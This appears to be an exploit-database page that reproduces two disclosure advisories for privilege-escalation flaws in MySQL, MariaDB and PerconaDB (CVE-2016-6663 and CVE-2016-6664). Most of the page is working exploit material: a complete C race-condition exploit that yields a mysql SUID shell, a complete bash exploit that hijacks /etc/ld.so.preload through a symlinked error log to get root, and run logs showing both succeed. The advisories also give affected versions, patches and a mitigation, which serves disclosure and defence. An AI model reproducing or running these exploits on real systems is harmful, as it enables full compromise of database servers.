Oct 28 10:53 poctab1.MYD Race Condition ~~~~~~~~~~~~~~~~~~ Observing file operations performed on the table stored within the directory, it was discovered that REPAIR TABLE SQL statement which is available to low-privileged users with SELECT/CREATE/INSERT grants, performed unsafe operations on temporary files created during the table repair process. Executing the statement: ``` mysql> REPAIR TABLE `poctab1`; +----------------+--------+----------+----------+ | Table | Op | Msg_type | Msg_text | +----------------+--------+----------+----------+ | testdb.poctab1 | repair | status | OK | +----------------+--------+----------+----------+ would result in execution of the following system calls: [pid 1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 [pid 1463] open("/tmp/disktable/poctab1.MYD", O_RDWR) = 65 [pid 1463] access("./testdb/poctab1.TRG", F_OK) = -1 ENOENT (No such file or directory) [pid 1463] lseek(65, 0, SEEK_CUR) = 0 [pid 1463] lseek(65, 0, SEEK_END) = 0 [pid 1463] mprotect(0x7f6a3804f000, 12288, PROT_READ|PROT_WRITE) = 0 [pid 1463] open("/tmp/disktable/poctab1.TMD", O_RDWR|O_CREAT|O_EXCL|O_TRUNC, 0660) = 66 [pid 1463] lseek(65, 0, SEEK_END) = 0 [pid 1463] lseek(64, 0, SEEK_END) = 1024 [pid 1463] close(65) = 0 [pid 1463] close(66) = 0 [pid 1463] lstat("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0 [pid 1463] lstat("/tmp/disktable", {st_mode=S_IFDIR|0777, st_size=4096, ...}) = 0 [pid 1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 [pid 1463] stat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 [pid 1463] chmod("/tmp/disktable/poctab1.TMD", 0660) = 0 [pid 1463] chown("/tmp/disktable/poctab1.TMD", 110, 115) = 0 [pid 1463] unlink("/tmp/disktable/poctab1.MYD") = 0 [pid 1463] rename("/tmp/disktable/poctab1.TMD", "/tmp/disktable/poctab1.MYD") = 0 ``` The first call: ``` [pid 1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 ``` was found to check file permissions of poctab1.MYD table which are then copied with chmod() to the newly created poctab1.TMD temporary file containing the repaired table. The code is vulnerable to Race Condition between the call: ``` [pid 1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 ``` and ``` [pid 1463] chmod("/tmp/disktable/poctab1.TMD", 0660) = 0 ``` If an attacker managed to unlink the temporary table poctab1.TMD and replace it with a symlink to /var/lib/mysql before the chmod() operation (i.e. win the race), they would be able to apply arbitrary permissions on the data directory. The attacker would be able to control the set of permissions by pre-setting them on poctab1.MYD file before executing the REPAIR TABLE statement. For example, by setting the permissions of poctab1.MYD to 777 the data directory would become readable and writable to the attacker. Obtaining mysql-suid shell ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Apart from gaining access to arbitrary mysql files, the attacker could also achieve arbitrary code execution in the context of mysql user (mysql shell). This could be done by first pre-setting permissions on poctab1.MYD to 04777 (suid), and winning the race so that the permissions get applied on a copy of a bash shell file through the vulnerable chmod() call effectively creating a shell that elevates their permissions after execution. There is only one problem. Their suid shell would remain to be owned by the attacker's user id and not 'mysql' user. To elevate their privileges, attacker would need to copy the bash shell to a mysql-owned table file which are owned by mysql user. However mysql table files are not writable by other users making it impossible for attacker to save the shell. This could be bypassed if attacker created a specially crafted directory with a group sticky bit and then created a second table named 'poctab2' as follows: attacker@debian:/tmp/disktable$ chmod g+s /tmp/disktable/ attacker@debian:/tmp/disktable$ ls -ld /tmp/disktable/ drwxrwsrwx 2 attacker attacker 4096 Oct 28 11:25 /tmp/disktable/ mysql> CREATE TABLE poctab2 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable'; Query OK, 0 rows affected (0.00 sec) attacker@debian:/tmp/disktable$ ls -l /tmp/disktable/ total 0 -rw-rw---- 1 mysql mysql 0 Oct 28 11:04 poctab1.MYD -rw-rw---- 1 mysql attacker 0 Oct 28 11:34 poctab2.MYD As we can see poctab2.MYD table (thanks to the sticky bit (+s) on the permissions of the group on disktable directory) has 'mysql' as the owner but 'attacker' as the group. Therefore, the attacker would now be able to copy /bin/bash to poctab2.MYD file and preserve the file owner. Finally, they could exploit the Race Condition again and have SUID + exec permissions applied on poctab2.MYD which would then allow them to execute the suid shell with elevated privileges of the mysql user. From mysql to root ~~~~~~~~~~~~~~~~~~~~~~~~ After obtaining a mysql suid shell, attackers could then exploit one of the other MySQL vulnerabilities discovered by the author of this advisory: CVE-2016-6662 or CVE-2016-6664 (Oracle CVE-2016-5617) to escalate their privileges from mysql user to root system user. V. PROOF OF CONCEPT EXPLOIT ------------------------- ------------------[ mysql-privesc-race.c ]-------------------- ``` /* MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit mysql-privesc-race.c (ver. 1.0) CVE-2016-6663 / OCVE-2016-5616 Discovered/Coded by: Dawid Golunski dawid[at]legalhackers.com @dawid_golunski http://legalhackers.com Compile: gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient Note: * On RedHat-based systems you might need to change /tmp to another public directory * For testing purposes only. Do no harm. Full advisory URL: http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html */ #include <fcntl.h> #include <grp.h> #include <mysql.h> #include <pwd.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/inotify.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/wait.h> #include <time.h> #include <unistd.h> #define EXP_PATH "/tmp/mysql_privesc_exploit" #define EXP_DIRN "mysql_privesc_exploit" #define MYSQL_TAB_FILE EXP_PATH "/exploit_table.MYD" #define MYSQL_TEMP_FILE EXP_PATH "/exploit_table.TMD" #define SUID_SHELL EXP_PATH "/mysql_suid_shell.MYD" #define MAX_DELAY 1000 // can be used in the race to adjust the timing if necessary MYSQL *conn; // DB handles MYSQL_RES *res; MYSQL_ROW row; unsigned long cnt; void intro() { printf( "\033[94m\n" "MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\n" "mysql-privesc-race.c (ver. 1.0)\n\n" "CVE-2016-6663 / OCVE-2016-5616\n\n" "For testing purposes only. Do no harm.\n\n" "Discovered/Coded by:\n\n" "Dawid Golunski \n" "http://legalhackers.com" "\033[0m\n\n"); } void usage(char *argv0) { intro(); printf("Usage:\n\n%s user pass db_host database\n\n", argv0); } void mysql_cmd(char *sql_cmd, int silent) { if (!silent) { printf("%s \n", sql_cmd); } if (mysql_query(conn, sql_cmd)) { fprintf(stderr, "%s\n", mysql_error(conn)); exit(1); } res = mysql_store_result(conn); if (res>0) mysql_free_result(res); } int main(int argc,char **argv) { int randomnum = 0; int io_notified = 0; int myd_handle; int wpid; int is_shell_suid=0; pid_t pid; int status; struct stat st; /* io notify */ int fd; int ret; char buf[4096] __attribute__((aligned(8))); int num_read; struct inotify_event *event; /* credentials */ char *user = argv[1]; char *password = argv[2]; char *db_host = argv[3]; char *database = argv[4]; // Disable buffering of stdout setvbuf(stdout, NULL, _IONBF, 0); // Get the params if (argc!=5) { usage(argv[0]); exit(1); } intro(); // Show initial privileges printf("\n[+] Starting the exploit as: \n"); system("id"); // Connect to the database server with provided credentials printf("\n[+] Connecting to the database `%s` as %s@%s\n", database, user, db_host); conn = mysql_init(NULL); if (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) { fprintf(stderr, "%s\n", mysql_error(conn)); exit(1); } // Prepare tmp dir printf("\n[+] Creating exploit temp directory %s\n", "/tmp/" EXP_DIRN); umask(000); system("rm -rf /tmp/" EXP_DIRN " && mkdir /tmp/" EXP_DIRN); system("chmod g+s /tmp/" EXP_DIRN ); // Prepare exploit tables :) printf("\n[+] Creating mysql tables \n\n"); mysql_cmd("DROP TABLE IF EXISTS exploit_table", 0); mysql_cmd("DROP TABLE IF EXISTS mysql_suid_shell", 0); mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0); mysql_cmd("CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0); // Copy /bin/bash into the mysql_suid_shell.MYD mysql table file // The file should be owned by mysql:attacker thanks to the sticky bit on the table directory printf("\n[+] Copying bash into the mysql_suid_shell table.\n After the exploitation the following file/table will be assigned SUID and executable bits : \n"); system("cp /bin/bash " SUID_SHELL); system("ls -l " SUID_SHELL); // Use inotify to get the timing right fd = inotify_init(); if (fd < 0) { printf("failed to inotify_init\n"); return -1; } ret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE); /* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID+exec perms */ printf("\n[+] Entering the race loop... Hang in there...\n"); while ( is_shell_suid != 1 ) { cnt++; if ( (cnt % 100) == 0 ) { printf("->"); //fflush(stdout); } /* Create empty file , remove if already exists */ unlink(MYSQL_TEMP_FILE); unlink(MYSQL_TAB_FILE); mysql_cmd("DROP TABLE IF EXISTS exploit_table", 1); mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 1); /* random num if needed */ srand ( time(NULL) ); randomnum = ( rand() % MAX_DELAY ); // Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlink pid = fork(); if (pid < 0) { fprintf(stderr, "Fork failed :(\n"); } /* Child process - executes REPAIR TABLE SQL statement */ if (pid == 0) { usleep(500); unlink(MYSQL_TEMP_FILE); mysql_cmd("REPAIR TABLE exploit_table EXTENDED", 1); // child stops here exit(0); } /* Parent process - aims to replace the temp .tmd table with a symlink before chmod */ if (pid > 0 ) { io_notified = 0; while (1) { int processed = 0; ret = read(fd, buf, sizeof(buf)); if (ret < 0) { break; } while (processed < ret) { event = (struct inotify_event *)(buf + processed); if (event->mask & IN_CLOSE) { if (!strcmp(event->name, "exploit_table.TMD")) { //usleep(randomnum); // Set the .MYD permissions to suid+exec before they get copied to the .TMD file unlink(MYSQL_TAB_FILE); myd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777); close(myd_handle); chmod(MYSQL_TAB_FILE, 04777); // Replace the temp .TMD file with a symlink to the target sh binary to get suid+exec unlink(MYSQL_TEMP_FILE); symlink(SUID_SHELL, MYSQL_TEMP_FILE); io_notified=1; } } processed += sizeof(struct inotify_event); } if (io_notified) { break; } } waitpid(pid, &status, 0); } // Check if SUID bit was set at the end of this attempt if ( lstat(SUID_SHELL, &st) == 0 ) { if (st.st_mode & S_ISUID) { is_shell_suid = 1; } } } printf("\n\n[+] \033[94mBingo! Race won (took %lu tries) !\033[0m Check out the \033[94mmysql SUID shell\033[0m: \n\n", cnt); system("ls -l " SUID_SHELL); printf("\n[+] Spawning the \033[94mmysql SUID shell\033[0m now... \n Remember that from there you can gain \033[1;31mroot\033[0m with vuln \033[1;31mCVE-2016-6662\033[0m or \033[1;31mCVE-2016-6664\033[0m :)\n\n"); system(SUID_SHELL " -p -i "); //system(SUID_SHELL " -p -c '/bin/bash -i -p'"); /* close MySQL connection and exit */ printf("\n[+] Job done. Exiting\n\n"); mysql_close(conn); return 0; } ``` Example run: ~~~~~~~~~~~~~~ ``` attacker@xenial:~/mysql-exploit$ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04.1 LTS Release: 16.04 Codename: xenial attacker@xenial:~/mysql-exploit$ dpkg -l | grep -i mariadb-serv ii mariadb-server 10.0.27-0ubuntu0.16.04.1 all MariaDB database server (metapackage depending on the latest version) ii mariadb-server-10.0 10.0.27-0ubuntu0.16.04.1 amd64 MariaDB database server binaries ii mariadb-server-core-10.0 10.0.27-0ubuntu0.16.04.1 amd64 MariaDB database core server files attacker@xenial:~/mysql-exploit$ id uid=1001(attacker) gid=1001(attacker) groups=1001(attacker) attacker@xenial:~/mysql-exploit$ mysql -uattacker -ppocsql -hlocalhost pocdb -e 'show grants;' +-----------------------------------------------------------------------------------------------------------------+ | Grants for attacker@localhost | +-----------------------------------------------------------------------------------------------------------------+ | GRANT USAGE ON *.* TO 'attacker'@'localhost' IDENTIFIED BY PASSWORD '*3CC3900C7B2B0A885AB128894FC10949340A09CC' | | GRANT SELECT, INSERT, CREATE, DROP ON `pocdb`.* TO 'attacker'@'localhost' | +-----------------------------------------------------------------------------------------------------------------+ attacker@xenial:~/mysql-exploit$ ls -l /var/lib/mysql/mysql/user.* ls: cannot access '/var/lib/mysql/mysql/user.*': Permission denied attacker@xenial:~/mysql-exploit$ time ./mysql-privesc-race attacker pocsql localhost pocdb MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit mysql-privesc-race.c (ver. 1.0) CVE-2016-6663 / OCVE-2016-5616 For testing purposes only. Do no harm. Discovered/Coded by: Dawid Golunski http://legalhackers.com [+] Starting the exploit as: uid=1001(attacker) gid=1001(attacker) groups=1001(attacker) [+] Connecting to the database `pocdb` as attacker@localhost [+] Creating exploit temp directory /tmp/mysql_privesc_exploit [+] Creating mysql tables DROP TABLE IF EXISTS exploit_table DROP TABLE IF EXISTS mysql_suid_shell CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' [+] Copying bash into the mysql_suid_shell table. After the exploitation the following file/table will be assigned SUID and executable bits : -rw-rw---- 1 mysql attacker 1037528 Nov 1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD [+] Entering the race loop... Hang in there... [+] Bingo! Race won (took 5 tries) ! Check out the mysql SUID shell: -rwsrwxrwx 1 mysql attacker 1037528 Nov 1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD [+] Spawning the mysql SUID shell now... Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :) mysql_suid_shell.MYD-4.3$ whoami mysql mysql_suid_shell.MYD-4.3$ id uid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker) mysql_suid_shell.MYD-4.3$ ls -l /var/lib/mysql/mysql/user.* -rw-rw---- 1 mysql mysql 2879 Oct 29 14:23 /var/lib/mysql/mysql/user.frm -rw-rw---- 1 mysql mysql 168 Oct 29 22:35 /var/lib/mysql/mysql/user.MYD -rw-rw---- 1 mysql mysql 4096 Oct 30 00:11 /var/lib/mysql/mysql/user.MYI mysql_suid_shell.MYD-4.3$ exit exit [+] Job done. Exiting real 0m28.999s user 0m0.016s sys 0m0.016s ``` Video PoC: ~~~~~~~~~~~~ http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html VI. BUSINESS IMPACT ------------------------- Malicious local users with DB access granted a common set of privileges (SELECT/INSERT/CREATE) could exploit this vulnerability to execute arbitrary code and escalate their privileges to mysql system user. This would allow them to gain access to all of the databases stored on the server as well as exploit CVE-2016-6662 or CVE-2016-6664 vulnerabilities to further elevate privileges to root system user (rootshell) and fully compromise the target server. This vulnerability could for example be exploited by malicious users in a shared hosting environment where each user is supposed to have access to only one database assigned to them. It could also be exploited by attackers who have managed to find a vulnerability in a website and gained access to the target system as a low-privileged user (such as apache/www-data). VII. SYSTEMS AFFECTED ------------------------- MariaDB < 5.5.52 < 10.1.18 < 10.0.28 MySQL <= 5.5.51 <= 5.6.32 <= 5.7.14 Percona Server < 5.5.51-38.2 < 5.6.32-78-1 < 5.7.14-8 Percona XtraDB Cluster < 5.6.32-25.17 < 5.7.14-26.17 < 5.5.41-37.0 When checking if your system contains the patches, note that this vulnerability has been known under two CVE IDs: CVE-2016-6663 CVE-2016-5616 CVE-2016-6663 is the original CVE that was agreed to be used by all the affected vendors. The issue was however mentioned in Oracle CPU mistakenly under a new CVE of CVE-2016-5616, resulting in a duplicate. Oracle has informed that CPU will be updated to state that CVE-2016-5616 is equivalent to CVE-2016-6663. VIII. SOLUTION ------------------------- MariaDB/MySQL/PerconaDB vendors have received a copy of this advisory in advance which allowed them to produce patches for this vulnerability before disclosure. Update to security releases issued by the vendor. As a temporary mitigation, you can disable symbolic link support in the database server configuration with the following my.cnf config setting: symbolic-links = 0 Nevertheless, an update to a patched release is recommended. IX. REFERENCES ------------------------- http://legalhackers.com This advisory (CVE-2016-6663 / OCVE-2016-5616): http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html Exploit (mysql-privesc-race.c) source code URL: http://legalhackers.com/exploits/mysql-privesc-race.c Video PoC: http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html Advisory for CVE-2016-6664 / OCVE-2016-5617: http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html Vendor updates: http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL http://www.mysql.com/ https://mariadb.org/about/ https://mariadb.com/kb/en/mdb-5552-rn/ https://mariadb.com/kb/en/mdb-10118-rn/ https://mariadb.com/kb/en/mdb-10028-rn/ https://www.percona.com/software X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com http://legalhackers.com XI. REVISION HISTORY ------------------------- 01.11.2016 - Advisory released XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. id SSV:92510 last seen 2017-11-19 modified 2016-11-02 published 2016-11-02 reporter Root source https://www.seebug.org/vuldb/ssvid-92510 title MySQL / MariaDB / PerconaDB 提权/条件竞争漏洞(CVE-2016-6663) bulletinFamily exploit description I. VULNERABILITY ------------------------- MySQL / MariaDB / PerconaDB - Root Privilege Escalation MySQL <= 5.5.51 <= 5.6.32 <= 5.7.14 MariaDB All current Percona Server < 5.5.51-38.2 < 5.6.32-78-1 < 5.7.14-8 Percona XtraDB Cluster < 5.6.32-25.17 < 5.7.14-26.17 < 5.5.41-37.0 II. BACKGROUND ------------------------- MySQL: "MySQL is the world's most popular open source database. Whether you are a fast growing web property, technology ISV or large enterprise, MySQL can cost-effectively help you deliver high performance, scalable database applications." "Many of the world's largest and fastest-growing organizations including Facebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time and money powering their high-volume Web sites, business-critical systems and packaged software." http://www.mysql.com/products/ http://www.mysql.com/why-mysql/ -- MariaDB: "MariaDB is one of the most popular database servers in the world. Its made by the original developers of MySQL and guaranteed to stay open source. Notable users include Wikipedia, WordPress.com and Google. MariaDB turns data into structured information in a wide array of applications, ranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. MariaDB is used because it is fast, scalable and robust, with a rich ecosystem of storage engines, plugins and many other tools make it very versatile for a wide variety of use cases." https://mariadb.org/about/ -- PerconaDB: "Percona Server for MySQL is a free, fully compatible, enhanced, open source drop-in replacement for MySQL that provides superior performance, scalability and instrumentation. With over 3,000,000 downloads, Percona Server芒鈧劉s self-tuning algorithms and support for extremely high-performance hardware delivers excellent performance and reliability." https://www.percona.com/software/mysql-database/percona-server III. INTRODUCTION ------------------------- MySQL-based databases including MySQL, MariaDB and PerconaDB are affected by a privilege escalation vulnerability which can let attackers who have gained access to mysql system user to further escalate their privileges to root user allowing them to fully compromise the system. The vulnerability stems from unsafe file handling of error logs and other files. IV. DESCRIPTION ------------------------- The error.log file on most default installations of MySQL/PerconaDB/MariaDB databases is stored either in /var/log/mysql or /var/lib/mysql directory. The permissions on the file and directory look as follows: ``` root@trusty:/var/lib/mysql# ls -la /var/log/mysql total 468 drwxr-s--- 2 mysql adm 4096 Sep 11 06:25 . drwxrwxr-x 36 root syslog 4096 Sep 11 06:25 .. -rw-r----- 1 mysql adm 0 Sep 11 06:25 error.log root@trusty:/var/lib/mysql# ls -lad /var/log/mysql drwxr-s--- 2 mysql adm 4096 Sep 11 06:25 /var/log/mysql ``` mysqld_safe wrapper that is normally used for starting MySQL daemon and creating/reopening the error.log performs certain unsafe file operations that may allow attackers to gain root privileges. The wrapper script contains a 'while' loop shown below which monitors the mysqld process and performs a restart in case of the process failure. The restart involves re-creation of the error.log file if syslog logging has not been configured instead of error log files (file-based logging is the default setting on most installations). --------[ mysqld_safe ]-------- ``` [...] while true do rm -f "$pid_file" # Some extra safety start_time=`date +%M%S` eval_log_error "$cmd" if [ $want_syslog -eq 0 -a ! -f "$err_log" ]; then touch "$err_log" # hypothetical: log was renamed but not chown $user "$err_log" # flushed yet. we'd recreate it with chmod "$fmode" "$err_log" # wrong owner next time we log, so set fi # it up correctly while we can! [...] ``` ------------------------------- As can be seen, the error.log file is created (touch) and chowned to the user running the mysqld daemon (typically 'mysql'). The operation is vulnerable to a symlink attack. Attackers who obtained access to mysql account, through CVE-2016-6663 vulnerability described at: http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html would gain access to /var/log or /var/lib/mysql directories (owned by mysql user) and could therefore easily remove the error.log file and replace it with a symlink to an arbitrary system file and escalate privileges. The privilege escalation could be triggered instantly (without the need to wait for mysql service restart/reboot) by attackers having 'mysql' account by simply killing the mysqld child process (launched by the mysqld_safe wrapper). When the mysqld process gets terminated, the wrapper will then re-itertate the loop shown above and immediately create a mysql-owned file in the location specified by the attacker in the symlink thus allowing attackers to quickly escalate their privileges. V. PROOF OF CONCEPT EXPLOIT ------------------------- -------[ mysql-chowned.sh ]------ ``` #!/bin/bash -p # # MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit # mysql-chowned.sh (ver. 1.0) # # CVE-2016-6664 / OCVE-2016-5617 # # Discovered and coded by: # # Dawid Golunski # dawid[at]legalhackers.com # # https://legalhackers.com # # Follow https://twitter.com/dawid_golunski for updates on this advisory. # # This PoC exploit allows attackers to (instantly) escalate their privileges # from mysql system account to root through unsafe error log handling. # The exploit requires that file-based logging has been configured (default). # To confirm that syslog logging has not been enabled instead use: # grep -r syslog /etc/mysql # which should return no results. # # This exploit can be chained with the following vulnerability: # CVE-2016-6663 / OCVE-2016-5616 # which allows attackers to gain access to mysql system account (mysql shell). # # In case database server has been configured with syslog you may also use: # CVE-2016-6662 as an alternative to this exploit. # # Usage: # ./mysql-chowned.sh path_to_error.log # # # See the full advisory for details at: # https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html # # Video PoC: # https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html # # Disclaimer: # For testing purposes only. Do no harm. # BACKDOORSH="/bin/bash" BACKDOORPATH="/tmp/mysqlrootsh" PRIVESCLIB="/tmp/privesclib.so" PRIVESCSRC="/tmp/privesclib.c" SUIDBIN="/usr/bin/sudo" function cleanexit { # Cleanup echo -e "\n[+] Cleaning up..." rm -f $PRIVESCSRC rm -f $PRIVESCLIB rm -f $ERRORLOG touch $ERRORLOG if [ -f /etc/ld.so.preload ]; then echo -n > /etc/ld.so.preload fi echo -e "\n[+] Job done. Exiting with code $1 \n" exit $1 } function ctrl_c() { echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation." cleanexit 0 } #intro echo -e "\033[94m \nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \nmysql-chowned.sh (ver. 1.0)\n\nCVE-2016-6664 / OCVE-2016-5617\n" echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m" # Args if [ $# -lt 1 ]; then echo -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n" echo -e "It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n" exit 3 fi # Priv check echo -e "\n[+] Starting the exploit as \n\033[94m`id`\033[0m" id | grep -q mysql if [ $? -ne 0 ]; then echo -e "\n[!] You need to execute the exploit as mysql user! Exiting.\n" exit 3 fi # Set target paths ERRORLOG="$1" if [ ! -f $ERRORLOG ]; then echo -e "\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.\n" exit 3 fi echo -e "\n[+] Target MySQL log file set to $ERRORLOG" # [ Active exploitation ] trap ctrl_c INT # Compile privesc preload library echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)" cat <<_solibeof_>$PRIVESCSRC #define _GNU_SOURCE #include <stdio.h> #include <sys/stat.h> #include <unistd.h> #include <dlfcn.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> uid_t geteuid(void) { static uid_t (*old_geteuid)(); old_geteuid = dlsym(RTLD_NEXT, "geteuid"); if ( old_geteuid() == 0 ) { chown("$BACKDOORPATH", 0, 0); chmod("$BACKDOORPATH", 04777); //unlink("/etc/ld.so.preload"); } return old_geteuid(); } _solibeof_ /bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl" if [ $? -ne 0 ]; then echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC." cleanexit 2; fi # Prepare backdoor shell cp $BACKDOORSH $BACKDOORPATH echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`" # Safety check if [ -f /etc/ld.so.preload ]; then echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety." exit 2 fi # Symlink the log file to /etc rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG if [ $? -ne 0 ]; then echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink." cleanexit 3 fi echo -e "\n[+] Symlink created at: \n`ls -l $ERRORLOG`" # Wait for MySQL to re-open the logs echo -ne "\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\n" read -p "Do you want to kill mysqld process to instantly get root? :) ? [y/n] " THE_ANSWER if [ "$THE_ANSWER" = "y" ]; then echo -e "Got it. Executing 'killall mysqld' now..." killall mysqld fi while :; do sleep 0.1 if [ -f /etc/ld.so.preload ]; then echo $PRIVESCLIB > /etc/ld.so.preload rm -f $ERRORLOG break; fi done # /etc/ dir should be owned by mysql user at this point # Inject the privesc.so shared library to escalate privileges echo $PRIVESCLIB > /etc/ld.so.preload echo -e "\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \n`ls -l /etc/ld.so.preload`" echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload" echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`" chmod 755 /etc/ld.so.preload # Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!" sudo 2>/dev/null >/dev/null #while :; do # sleep 0.1 # ps aux | grep mysqld | grep -q 'log-error' # if [ $? -eq 0 ]; then # break; # fi #done # Check for the rootshell ls -l $BACKDOORPATH ls -l $BACKDOORPATH | grep rws | grep -q root if [ $? -eq 0 ]; then echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`" echo -e "\n\033[94mGot root! The database server has been ch-OWNED !\033[0m" else echo -e "\n[!] Failed to get root" cleanexit 2 fi # Execute the rootshell echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n" $BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB" $BACKDOORPATH -p # Job done. cleanexit 0 ``` ------------EOF------------------ Example run ~~~~~~~~~~~~~~~~ ``` mysql_suid_shell.MYD-4.3$ whoami mysql omysql_suid_shell.MYD-4.3$ dpkg -l | grep percona-server-server iU percona-server-server 5.6.32-78.0-1.xenial amd64 Percona Server database server iF percona-server-server-5.6 5.6.32-78.0-1.xenial amd64 Percona Server database server binaries mysql_suid_shell.MYD-4.3$ ./mysql-chowned.sh /var/lib/mysql/xenial-percona.err MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit mysql-chowned.sh (ver. 1.0) CVE-2016-6664 / OCVE-2016-5617 Discovered and coded by: Dawid Golunski http://legalhackers.com [+] Starting the exploit as uid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker) [+] Target MySQL log file set to /var/lib/mysql/xenial-percona.err [+] Compiling the privesc shared library (/tmp/privesclib.c) [+] Backdoor/low-priv shell installed at: -rwxr-xr-x 1 mysql attacker 1037528 Nov 1 05:08 /tmp/mysqlrootsh [+] Symlink created at: lrwxrwxrwx 1 mysql attacker 18 Nov 1 05:08 /var/lib/mysql/xenial-percona.err -> /etc/ld.so.preload [+] Waiting for MySQL to re-open the logs/MySQL service restart... Do you want to kill mysqld process to instantly get root? :) ? [y/n] y Got it. Executing 'killall mysqld' now... [+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: -rw-r----- 1 mysql root 19 Nov 1 05:08 /etc/ld.so.preload [+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload [+] The /etc/ld.so.preload file now contains: /tmp/privesclib.so [+] Escalating privileges via the /usr/bin/sudo SUID binary to get root! -rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh [+] Rootshell got assigned root SUID perms at: -rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh Got root! The database server has been ch-OWNED ! [+] Spawning the rootshell /tmp/mysqlrootsh now! mysqlrootsh-4.3# whoami root mysqlrootsh-4.3# exit exit [+] Cleaning up... [+] Job done. Exiting with code 0 ``` Video PoC: ~~~~~~~~~~~~~ 